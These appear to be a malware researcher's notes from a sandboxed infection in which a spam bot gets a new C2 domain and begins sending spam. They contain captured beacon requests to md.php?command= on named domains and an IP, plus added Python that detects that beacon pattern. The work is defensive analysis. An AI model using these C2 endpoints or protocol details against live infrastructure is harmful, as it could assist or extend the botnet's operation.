The computer froze yesterday around 22hs.
Started win9, already infected with e515267ba19417974a63b51e4f7dd9e9.
Some days ago, the domain papausafr.com stopped answering, a little after Mon, 13 Apr 2015 14:04:11 GMT in real time (04:07:42.825257 in the pcap time). So I will reboot it to see if it gets a new domain.
Rebooted win9. Same pcap file.
It seems that it worked! It is asking for a new domain, solocoufandle.com, and sending some GETs:
22:22:15.343895 tcp 10.0.2.109 49158 -> 37.187.245.14 80 SRPA_SPA 528 431935 s[120]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=getip H d[120]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..Content-Type: text/html..Transfer-Encoding: s[300]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=getip HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=ghl&id=1494363983 HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: d[300]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.37....1f..http://solocoufandle.com/md.php..0....HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..C
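An added example (not part of the original notes) that parses the client side of a flow record like the one above and flags the beacon pattern it shows (the bare "pb" User-Agent fetching md.php?command=...), so the same check can be run over other captured flows. The flow record is reconstructed from the capture line above; the assumption that ".." renders CRLF and that s[N]=/d[N]= are the client and server payload windows is mine.

```python
import re
from typing import Dict, List, Tuple

# Constructed flow record in the style of the capture above. Assumption: the
# tool prints payload bytes with ".." for CRLF (so "...." ends a request head)
# and s[N]= / d[N]= are the client and server payload windows.
FLOW = (
    "22:22:15.343895 tcp 10.0.2.109 49158 -> 37.187.245.14 80 SRPA_SPA 528 431935 "
    "s[300]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com.."
    "Cache-Control: no-cache....GET /md.php?command=getip HTTP/1.1..User-Agent: pb.."
    "Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=ghl&id=1494363983 "
    "HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: "
    "d[300]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Content-Type: text/html...."
)
REQ_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")

def client_payload(flow: str) -> str:
    """Return the client->server payload window (s[N]=...) of one flow record."""
    m = re.search(r"s\[\d+\]=(.*?)(?= d\[\d+\]=|$)", flow)
    return m.group(1) if m else ""

def parse_requests(payload: str) -> List[Dict[str, str]]:
    """Split a dotted payload into request heads: method, path, lower-cased
    headers. A head cut off by the window edge keeps the headers captured."""
    requests = []
    for head in payload.split("...."):
        lines = [ln for ln in head.split("..") if ln]
        if not lines or not (m := REQ_LINE.match(lines[0])):
            continue                      # not a request start (e.g. response data)
        req = {"method": m.group(1), "path": m.group(2)}
        for hdr in lines[1:]:
            if ": " in hdr:               # header value may be empty if truncated
                name, value = hdr.split(": ", 1)
                req[name.lower()] = value
        requests.append(req)
    return requests

def flag_beacons(requests: List[Dict[str, str]], ua: str = "pb",
                 c2_path: str = "/md.php") -> List[Tuple[str, str]]:
    """Return (host, command) for requests matching the beacon pattern in the
    capture: the bare 'pb' User-Agent fetching md.php?command=..."""
    hits = []
    for r in requests:
        if r.get("user-agent") == ua and r["path"].startswith(c2_path + "?command="):
            cmd = re.search(r"command=([^&]+)", r["path"]).group(1)
            hits.append((r.get("host", ""), cmd))
    return hits
```

Running flag_beacons(parse_requests(client_payload(FLOW))) on the record above yields the getip and ghl commands sent to solocoufandle.com; the /viber.php fetch is left out because it carries no command parameter.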
It starts verifying email addresses.
It starts sending SPAM.
We downloaded some of the web pages linked in the spam. The links in the spam are different, but the page they link to is mostly the same every time: http://sansarall.ru/. We started another capture (win8) accessing it.
poweroff